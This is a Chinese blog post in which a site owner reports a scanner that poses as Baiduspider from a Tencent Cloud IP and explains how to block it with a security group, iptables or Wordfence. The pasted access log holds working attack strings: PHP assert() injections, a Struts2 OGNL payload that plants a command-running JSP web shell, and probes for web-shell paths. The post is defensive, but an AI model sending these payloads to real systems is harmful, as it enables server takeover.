奶爸昨天在查看蜘蛛历史记录的时候发现百度蜘蛛Baiduspider在20日的时候疯狂的爬了一下我网站上没有的资源,当时也奇怪,但是并没有深究。
刚才再次查看蜘蛛记录的时候,发现百度今天没怎么来,奇怪,然后顺手搜了下昨天的那个蜘蛛ip,发现是腾讯云的IP,并不是百度的,也就是说有人用腾讯云的机器在冒充百度蜘蛛扫描互联网上的网站,看是否有漏洞可以利用。
假冒百度蜘蛛的抓取记录如下
2019-06-20 22:11:22 118.24.24.40 /plus/mytag_js.phpaid=999 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:22 118.24.24.40 /plus/mytag_js.phpaid=9999 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:22 118.24.24.40 /plus/mytag_js.phpaid=9527 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9521 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:21 118.24.24.40 /plus/mytag_js.phpaid=9191 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=909 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=9090 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=9013 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=8080 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=7888 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:20 118.24.24.40 /plus/mytag_js.phpaid=6022 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:19 118.24.24.40 /plus/mytag_js.phpaid=1 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:19 118.24.24.40 /plus/mytag_js.phpaid=1 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:19 118.24.24.40 /plus/mytag_js.phpaid=1 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:19 118.24.24.40 /plus/mytag_js.phpaid=1 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:18 118.24.24.40 /plus/mytag_js.php%20aid=9090 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:18 118.24.24.40 /plus/mytag_j.phpaid=6022 Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:18 118.24.24.40 /plus/mumaasp.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:17 118.24.24.40 /plus/mcds.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:16 118.24.24.40 /md5.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:16 118.24.24.40 /manage/Images/Sql.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:15 118.24.24.40 /kdatebase/index_.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:14 118.24.24.40 /images/css/Thumb.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:14 118.24.24.40 /statics/images/cache.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:14 118.24.24.40 /images/cache.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:14 118.24.24.40 /images/Sql.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:13 118.24.24.40 /dxyylc/md5.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:13 118.24.24.40 /dxyylc/md5.aspx Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:13 118.24.24.40 /data/img/css/xianf.ASP Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:13 118.24.24.40 /config/AspCms_Config.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:12 118.24.24.40 /config/AspCms_Config.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:12 118.24.24.40 /base/admin/cache.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:12 118.24.24.40 /admin/sdfg.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /admin/images/Sql.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /admin/error.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /admin/Admin_Ta.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /Templates/test.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /Templates/red.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:11 118.24.24.40 /Somnus/Somnus.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:10 118.24.24.40 /config/AspCms_Config.asp Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:10 118.24.24.40 /admin_aspcms/_system/AspCms_SiteSetting.asp?action=saves Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:08 118.24.24.40 /index.php?s=member&c=register&m=index Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:05 118.24.24.40 /?m=vod-search&wd=page:langif-A:epage:langvalpage:lang(_POpage:langST[hxg])endif-A Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:05 118.24.24.40 /index.php?m=vod-search&wd={{page:lang}if-A:e{page:lang}val{page:lang}($_PO{page:lang}ST[hxg])}{endif-A} Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:03 118.24.24.40 /?m=vod-search&wd=if-A:assert(_POST[a])endif-A Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:03 118.24.24.40 /index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A} Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:11:01 118.24.24.40 /?m=vod-search&wd=if-A:assert(_POST[a])endif-A Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:01 118.24.24.40 /index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A} Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:11:00 118.24.24.40 /index.php?s=/Core/File/uploadPictureBase64.html Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:10:59 35.221.115.221 /feed rssbot/1.4.4 (+https://t.me/saodayesub_bot)
2019-06-20 22:10:58 118.24.24.40 /?m=member&c=index&a=register&siteid=1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:10:58 118.24.24.40 /index.php?m=member&c=index&a=register&siteid=1 Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:10:58 118.24.24.40 /struts2-showcase/filedownload/index.action Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)
2019-06-20 22:10:57 118.24.24.40 /struts2-showcase/filedownload/index.action?method:%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20out.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
2019-06-20 22:10:56 118.24.24.40 /research.asp?searchkey=x&anclassid=0&search=%20all Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£©
查询这个IP结果如下
当前IP 118.24.24.40
地理位置 中国四川成都
所有者/运营商 tencent.com / 电信/联通/移动
时区 Asia/Shanghai UTC+8
地区中心经纬度 30.659462, 104.065735
端口协议 该IP开放了1个端口,识别出1种协议。
威胁情报 机器人, 僵尸网络, 恶意软件, 网络攻击
所以就需要动手屏蔽这个ip了。
148.70.115.40 这个IP也是恶意爬虫
119.187.243.126 这个IP也是假冒百度蜘蛛的爬虫
腾讯云屏蔽这个ip的方法
腾讯云自带安全组,所以就没有必要动用自己vps的防火墙来拦截了。
登录腾讯云后台,找到的你VPS实例,然后切换到安全组标签。
在入站规则处点击添加规则按钮。
然后按照上图填写上规则保存,就可以了。
其他服务器屏蔽方法
如果你使用的服务器没有安全组这一个功能,那么可以利用自己服务器本身的iptables防火墙来拦截这个IP。
iptables的规则如下
iptables -I INPUT -s 118.24.24.40 -j DROP
插件屏蔽方法
如果你不会vps命令,那么你也可以直接通过防火墙插件来拦截,例如奶爸安装的Wordfence(参见WordPress官方推荐的4款恶意软件扫描插件)
进入Blocking选项,然后添加拦截的IP规则,保存就可以了,方法如下图:
另外这个插件本身还可以设置抓取规则,如果某个ip访问网站频率到达多少就自动阻止,感兴趣的可以研究一下。
